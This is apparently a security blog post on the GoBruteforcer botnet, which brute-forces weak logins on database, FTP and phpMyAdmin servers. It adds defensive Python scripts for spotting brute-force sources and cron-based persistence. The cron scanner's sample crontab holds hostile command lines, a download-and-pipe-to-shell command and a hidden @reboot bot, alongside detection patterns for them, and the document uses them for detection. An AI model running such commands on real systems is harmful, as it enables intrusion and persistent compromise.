
GOBruteforcer: an Active Web Server Harvester

Go (also known as Golang) is a relatively young programming language, and it has become popular with malware authors. It has proven a versatile platform for building all kinds of malware, including ransomware, stealers, and remote access Trojans (RATs). Golang-based botnets in particular appear attractive to attackers looking to gain a foothold in victim networks. 

GoBruteforcer is a recent example of this trend: a Golang-based botnet that targets web servers, specifically those running phpMyAdmin, MySQL, FTP, and Postgres. 

How GoBruteforcer Works

According to the analysis published by Palo Alto Networks, GoBruteforcer is built for more than one processor architecture, including x86, x64, and ARM. 

Execution of the malicious code depends on certain conditions being met: the binary must be launched with specific command-line arguments, and the targeted services must already be installed on the system and protected only by weak passwords. The malware proceeds only when all of these requirements are satisfied. 

  • The malware relies on weak passwords to gain access to vulnerable Unix-like systems. 
  • To begin the attack, it scans for potential targets running MySQL, Postgres, FTP, or phpMyAdmin. 

Expansion of Networks 

The malware has been updated with a multi-scan module that can find a much larger set of potential targets than before.
  • GoBruteforcer takes a Classless Inter-Domain Routing (CIDR) block as its target and scans that whole range for vulnerable hosts. A CIDR block denotes a range of IP addresses within a single network; scanning an entire range gives the attacker far more candidate targets than a single IP address would.
  • For each host in the range, it probes for open ports belonging to the services listed above. When it finds one, it attempts a brute-force login against that service on that machine. 
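
From the defender's side, the behaviour described above leaves a recognisable trace: one source address producing bursts of failed logins, often against several different hosts and services at once. The following is an added example, not code from the original post or from any vendor report, that runs such detection logic over centralised, syslog-style log lines. The line layout ("timestamp host service: message") and the sample entries are constructed for the example; the per-service failure patterns approximate the failed-login messages of MySQL, PostgreSQL, vsftpd and phpMyAdmin and should be adjusted to your own log_line_prefix and syslog format.

```python
"""Flag brute-force sources in centralised failed-login logs.

Added example for illustration only. Log line layout and sample entries are
constructed; the regexes approximate real service messages and may need tuning.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed layout: "<ISO timestamp> <target host> <service>: <message>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+): (.*)$")

# One pattern per service; each captures the source IP of a failed login.
FAIL_PATTERNS = {
    "mysqld": re.compile(r"Access denied for user '[^']*'@'([\d.]+)'"),
    "postgres": re.compile(r'password authentication failed for user "[^"]*" from ([\d.]+)'),
    "vsftpd": re.compile(r'FAIL LOGIN: Client "([\d.]+)"'),
    "phpmyadmin": re.compile(r"user denied: .* from ([\d.]+)"),
}


def parse_failures(lines):
    """Yield (timestamp, target_host, service, source_ip) for each failed login."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, host, service, msg = m.groups()
        pat = FAIL_PATTERNS.get(service)
        if pat is None:
            continue
        hit = pat.search(msg)
        if hit:
            yield datetime.fromisoformat(ts), host, service, hit.group(1)


def detect_bruteforce(lines, window=timedelta(minutes=5), threshold=10, min_targets=2):
    """Return {source_ip: summary} for sources that either exceed `threshold`
    failures inside any `window`, or that hit at least `min_targets` distinct
    hosts (the multi-target scanning pattern), whatever the per-host count."""
    by_src = defaultdict(list)
    for ts, host, service, src in parse_failures(lines):
        by_src[src].append((ts, host, service))

    findings = {}
    for src, events in by_src.items():
        events.sort()
        hosts = {h for _, h, _ in events}
        services = {s for _, _, s in events}
        # Sliding window: largest number of failures inside any `window`.
        peak, start = 0, 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold or len(hosts) >= min_targets:
            findings[src] = {
                "peak_failures": peak,
                "targets": sorted(hosts),
                "services": sorted(services),
            }
    return findings


SAMPLE_LOG = [
    # Constructed: one source probing three different hosts and services.
    "2023-03-10T12:00:01 web-01 mysqld: [Note] Access denied for user 'root'@'203.0.113.5' (using password: YES)",
    "2023-03-10T12:00:02 web-01 mysqld: [Note] Access denied for user 'admin'@'203.0.113.5' (using password: YES)",
    '2023-03-10T12:00:05 db-01 postgres: FATAL:  password authentication failed for user "postgres" from 203.0.113.5',
    '2023-03-10T12:00:06 db-01 postgres: FATAL:  password authentication failed for user "postgres" from 203.0.113.5',
    '2023-03-10T12:00:09 ftp-01 vsftpd: [pid 4321] [ftp] FAIL LOGIN: Client "203.0.113.5"',
    '2023-03-10T12:00:10 ftp-01 vsftpd: [pid 4321] [admin] FAIL LOGIN: Client "203.0.113.5"',
    # Constructed: a legitimate user who mistyped a password once.
    "2023-03-10T12:01:00 web-01 mysqld: [Note] Access denied for user 'alice'@'192.0.2.9' (using password: YES)",
] + [
    # Constructed: a single host hammered through phpMyAdmin, 12 failures in 22 seconds.
    f"2023-03-10T12:02:{i:02d} web-01 phpmyadmin: user denied: root (mysql-denied) from 198.51.100.7"
    for i in range(0, 24, 2)
]

if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_LOG).items():
        print(src, info)
```

The two rules deliberately differ: a high per-window count catches a classic single-target brute force, while the distinct-host rule catches a source that spreads only a few attempts over many machines, which a per-host threshold alone would miss. Both thresholds are starting points to tune against your own baseline of legitimate failed logins.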
Aspects of the Post-Infection Period

  • Once GoBruteforcer has successfully broken in, it deploys an IRC bot that picks up the attacker's URL for later use. 
  • The bot then communicates with the C2 server and waits for the attacker to send further directives. 
  • The IRC bot's registration information is stored in a cron job, which serves as the persistence mechanism. 

GoBruteforcer's multiscan feature lets its operators scan a wide range of devices across different networks all at once. 
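
Because the persistence described above lives in cron, a routine review of cron entries is a practical hunt for this class of compromise. Below is an added example, not code from the original post and not based on any published indicator, that parses crontab text and flags entries matching generic persistence heuristics (binaries in world-writable temp directories, hidden paths, download-and-pipe-to-shell, runtime base64 decoding, @reboot schedules, IRC-related strings). The sample crontab is constructed; the heuristic list is an assumption about what a reviewer would want to see, not a GoBruteforcer signature.

```python
"""Flag suspicious cron entries of the kind used for persistence.

Added example for illustration only. Heuristics are generic (not indicators
from any report) and the sample crontab below is constructed.
"""
import glob
import re

# Constructed heuristic list: (pattern, reason). Tune to your environment.
SUSPICIOUS = [
    (re.compile(r"(^|[\s/])(/tmp|/dev/shm|/var/tmp)/"), "runs a file from a world-writable temp dir"),
    (re.compile(r"/\.[^/\s]+"), "references a hidden (dot) path"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "downloads and pipes to a shell"),
    (re.compile(r"base64\s+(-d|--decode)"), "decodes base64 at runtime"),
    (re.compile(r"@reboot"), "runs at every reboot"),
    (re.compile(r"\b(irc|6667|6697)\b", re.I), "mentions IRC or a common IRC port"),
]

# A cron line is either "@keyword command" or five schedule fields then a command.
CRON_LINE = re.compile(r"^(@\w+|(?:\S+\s+){5})(.*)$")

# Where cron entries normally live on a Linux host (paths for scan_host, not IoCs).
CRON_LOCATIONS = ["/etc/crontab", "/etc/cron.d/*", "/var/spool/cron/crontabs/*", "/var/spool/cron/*"]


def parse_crontab(text, system_wide=False):
    """Return [(schedule, command)] from crontab text, skipping blank lines,
    comments and VAR=value assignments. System crontabs (/etc/crontab and
    /etc/cron.d) carry a user field between schedule and command."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        schedule, command = m.group(1).strip(), m.group(2).strip()
        if system_wide:  # drop the user field
            parts = command.split(None, 1)
            command = parts[1] if len(parts) > 1 else ""
        entries.append((schedule, command))
    return entries


def flag_entries(text, system_wide=False):
    """Return a list of {schedule, command, reasons} for entries that match
    at least one heuristic; the reasons list tells the reviewer why."""
    findings = []
    for schedule, command in parse_crontab(text, system_wide):
        subject = f"{schedule} {command}"
        reasons = [why for pat, why in SUSPICIOUS if pat.search(subject)]
        if reasons:
            findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings


def scan_host():
    """Walk the usual cron locations on the running host and flag entries.
    Unreadable files are skipped so the scan can run without root for a partial view."""
    report = {}
    for pattern in CRON_LOCATIONS:
        for path in glob.glob(pattern):
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            system_wide = path.startswith("/etc/")
            hits = flag_entries(text, system_wide=system_wide)
            if hits:
                report[path] = hits
    return report


SAMPLE_CRONTAB = """\
# constructed sample user crontab, not taken from any real infection
MAILTO=""
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * /usr/local/bin/backup.sh >/dev/null 2>&1
@reboot /tmp/.cache/.bot -s irc.example.invalid
* * * * * curl -s http://198.51.100.23/x.sh | sh
"""

if __name__ == "__main__":
    for finding in flag_entries(SAMPLE_CRONTAB):
        print(finding)
```

The benign certbot and backup entries pass through untouched, while the two constructed persistence entries are flagged with every reason that applies, so an analyst can triage by how many heuristics an entry trips rather than on a single match. Running scan_host() on a real system gives the same report keyed by file path.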

As long as default passwords are changed and a strong password policy, including two-factor authentication, is enforced, the risk from brute-force attacks of this kind is significantly reduced.

Threat actors have always been drawn to web servers because they are lucrative targets. Web servers are integral to an organization's operations, so allowing weak passwords on them invites serious security threats; weak or default passwords are exactly what malware such as GoBruteforcer exploits. 

GoBruteforcer's ability to scan multiple targets at once is what lets it reach a wide range of networks and do its job. It also appears to be under active development, so attackers are likely to adjust their strategies as they continue targeting web servers with this tool.